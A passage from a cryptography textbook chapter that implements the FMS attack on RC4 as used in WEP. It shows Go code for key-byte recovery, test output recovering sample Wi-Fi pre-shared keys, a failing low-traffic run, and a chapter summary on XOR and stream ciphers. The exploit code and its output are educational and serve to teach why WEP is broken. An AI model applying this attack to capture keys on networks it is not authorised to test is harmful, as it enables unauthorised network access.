45         totalCount += 1
46     }
47
48     var highestFreqCandidate byte
49     var highestFreqPercentage float64
50     for i := 0; i < 256; i++ {
51         freqPercentage := float64(freqDict[i]) / float64(totalCount) * 100
52         if freqPercentage > highestFreqPercentage {
53             highestFreqCandidate = byte(i)
54             highestFreqPercentage = freqPercentage
55         }
56     }
57
58     fmt.Printf("recovered byte: 0x%02x, frequency: %.2f%%\n", highestFreqCandidate, highestFreqPercentage)
59     return highestFreqCandidate
60 }
The output for our test is shown in listing 4.19. As you can see, the correct K[L] values (the ones that appeared as the most frequent candidates) also fall roughly in the 3-5% range. Congratulations, not only have we implemented the FMS attack, we have also successfully recovered a WEP PSK!
$ make exploit_rc4
go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 50000
recovered byte: 0x68, frequency: 4.32%
recovered byte: 0x65, frequency: 5.28%
recovered byte: 0x6c, frequency: 4.75%
recovered byte: 0x6c, frequency: 2.76%
recovered byte: 0x6f, frequency: 3.40%
recovered byte: 0x77, frequency: 4.37%
recovered byte: 0x6f, frequency: 4.69%
recovered byte: 0x72, frequency: 5.86%
recovered byte: 0x6c, frequency: 3.25%
recovered byte: 0x64, frequency: 3.49%
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x32, frequency: 5.56%
recovered byte: 0x33, frequency: 4.61%
exploit_rc4_test.go:18: recovered key: ”helloworld123”
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x73, frequency: 5.85%
recovered byte: 0x75, frequency: 4.66%
recovered byte: 0x70, frequency: 5.36%
recovered byte: 0x65, frequency: 4.31%
recovered byte: 0x72, frequency: 6.94%
recovered byte: 0x73, frequency: 5.47%
recovered byte: 0x65, frequency: 4.84%
recovered byte: 0x63, frequency: 5.97%
recovered byte: 0x72, frequency: 4.84%
recovered byte: 0x65, frequency: 6.28%
recovered byte: 0x74, frequency: 3.84%
recovered byte: 0x31, frequency: 5.10%
exploit_rc4_test.go:34: recovered key: ”1supersecret1”
--- PASS: TestRecoverWEPPSK (4.03s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 4.031
s
We have also just implemented our first probabilistic/statistical attack – one where the results are not guaranteed – and such attacks are encountered quite often in cryptography. The reader is encouraged to change WEPMessageVolume in listing 4.17 to different values to see how that impacts the results. With 50k messages (using weak IVs) we were able to recover the two PSKs we tested. If we set the message volume to 500 we get incorrect results, as shown in listing 4.20. The low volume corresponds to low-traffic Wi-Fi connections: it was easier to break WEP in public places like cafés, where there was a high volume of traffic (and hence more messages with weak IVs), than in residential areas, where it would take longer for weak IVs to appear. In other words, the more Wi-Fi traffic an attacker was able to capture with weak IVs, the more confidence they could gain in the results of their FMS attack.
Listing 4.20 Low message volume leads to incorrect results for the FMS attack
$ make exploit_rc4
go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 500
recovered byte: 0x68, frequency: 3.80%
recovered byte: 0x65, frequency: 5.40%
recovered byte: 0x6c, frequency: 3.40%
recovered byte: 0x6c, frequency: 3.60%
recovered byte: 0x94, frequency: 2.00%
recovered byte: 0x2c, frequency: 2.60%
recovered byte: 0x95, frequency: 3.80%
recovered byte: 0x72, frequency: 4.40%
recovered byte: 0x6c, frequency: 3.20%
recovered byte: 0x64, frequency: 2.40%
recovered byte: 0x31, frequency: 6.40%
recovered byte: 0x32, frequency: 4.00%
recovered byte: 0x33, frequency: 5.80%
exploit_rc4_test.go:20: recovered key: ”hell\x94,\x95rld123”
exploit_rc4_test.go:24: key mismatch, recovered: [104 101 108 108 148 44
149 114 108 100 49 50 51], original: [104 101 108 108 111 119 111 114
108 100 49 50 51]
--- FAIL: TestRecoverWEPPSK (0.04s)
FAIL
FAIL github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 0.038
s
FAIL
make: *** [Makefile:54: exploit_rc4] Error 1
4.4 Summary
XOR is a Boolean operation that takes two inputs and outputs true if and only if exactly one of them is true. In other words, XOR is true when one of its inputs is exclusively true.
XOR serves as the building block of many encryption algorithms because:
– When using the same key, encryption and decryption are reverse operations of
each other and hence ciphertext can be reversed back to plaintext using the original
key.
– For a bit encrypted with XOR, without knowledge of the key, all plaintexts (both
true and false) have equal probability of being the original message.
XOR encryption runs the risk of known-plaintext attacks, where an attacker can XOR a known plaintext with the corresponding ciphertext to recover the key.
An attacker can also XOR two ciphertexts to reveal XOR of their corresponding plain-
texts.
If we had a unique random key as long as the message for each message we wanted to encrypt, we could simply XOR them together to get the ciphertext, and it would be a perfect, unbreakable encryption system. This construction is called the "one-time pad", but it is not widely used because securely communicating a key as long as the message merely shifts the problem: now we have to solve the practical concerns of how to transport the key.
Therefore, instead of using XOR directly, we seed an RNG with a short “key” or
seed and then use the output of the RNG as our “keystream” which we XOR with
the plaintext.
Linear-feedback shift registers (LFSRs) can be used as stream ciphers but on their
own their internal working details can easily be reversed by exploiting the linear na-
ture of their output (e.g., by using linear algebra).
RC4 is a widely used stream cipher that was used insecurely by the first Wi-Fi security standard (WEP), allowing an attacker to recover the Wi-Fi password just by snooping on encrypted communications between genuine participants and then using the statistical biases in RC4 to recover the original pre-shared key.
References
[1] RC4. https://en.wikipedia.org/wiki/RC4
[2] Sub-Network Access Protocol (SNAP). https://www.firewall.cx/networking-topics/ethernet/ethernet-frame-formats/202-ieee-8023-snap-frame.html